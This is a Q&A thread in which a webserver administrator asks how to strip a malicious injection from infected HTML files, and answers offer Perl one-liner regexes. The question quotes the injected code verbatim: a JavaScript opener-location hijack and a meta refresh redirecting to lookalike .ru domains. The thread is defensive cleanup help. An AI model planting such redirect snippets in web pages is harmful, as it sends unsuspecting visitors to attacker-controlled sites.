How can I replace everything before the <html> tag with a Perl command?

Question

A folder on a webserver I manage was recently infected, and a malicious script was placed before the opening <html> tag in a whole mess of files. I'm trying to run a Perl string-replace script to clean it out.

The malicious files look something like this:

<script language="JavaScript">
parent.window.opener.location="http://vkk.coom.ny8pbpk.ru?nhzwhhh=ZE9taWlsX2nkPRE0LmZub3ffaUQ9PTM3MCbjb0RlNWFlZnrvaEx2b2JydWLuYUJxfwC%3D%3D";
</script>
<meta http-equiv="refresh" content="0;URL=http://yandex.ru.ny8pbpk.ru?pk=i%2FGWhteXsNcf0qzPwdiVgMkkhvrG1YbO25gYgPqe2saQmdIDmeiUlsiXmNEQmPCfhMSD5" />
<html>
<head>
......and the file goes on

I'm something of a mess with regex, and I've tried to glean as much as I can from other StackOverflow posts on how to use Perl's string replace. The biggest issue I'm running into is making it work over multiple lines.

Here's what I have so far:

perl -0777 -i -pe 's/\s*<html>/<html>/s' index.html

This seems to have no effect. If I change the second <html> to <foobar>, it correctly replaces it with <foobar>, but it ignores everything in front of it.

From what I can tell, the -0777 flag is supposed to "slurp" the whole file as one line, and the \s* should match the entire string before <html>, but again, my regex is lacking. Any help is greatly appreciated!

Answer 1

Try this:

perl -0777 -i -pe 's/^.*(?=<html>)//s' index.html

or this safer and more efficient pattern:

perl -0777 -i -pe 's/^(?>[^<]++|<(?!html>))*(?=<html>)//' index.html

Answer 2

\s* is too specific. You don't want to match only whitespace before the <html>. Try .* instead, which matches everything before the <html> (as long as the /s modifier is set, so that . also matches newlines).

Answer 3

\s* should be [\s\S]* so it matches all characters.

I found this to be a great reference: http://www.cs.tut.fi/~jkorpela/perl/regexp.html

So the final working command is:

perl -0777 -i -pe 's/[\s\S]*<html>/<html>/s' index.html
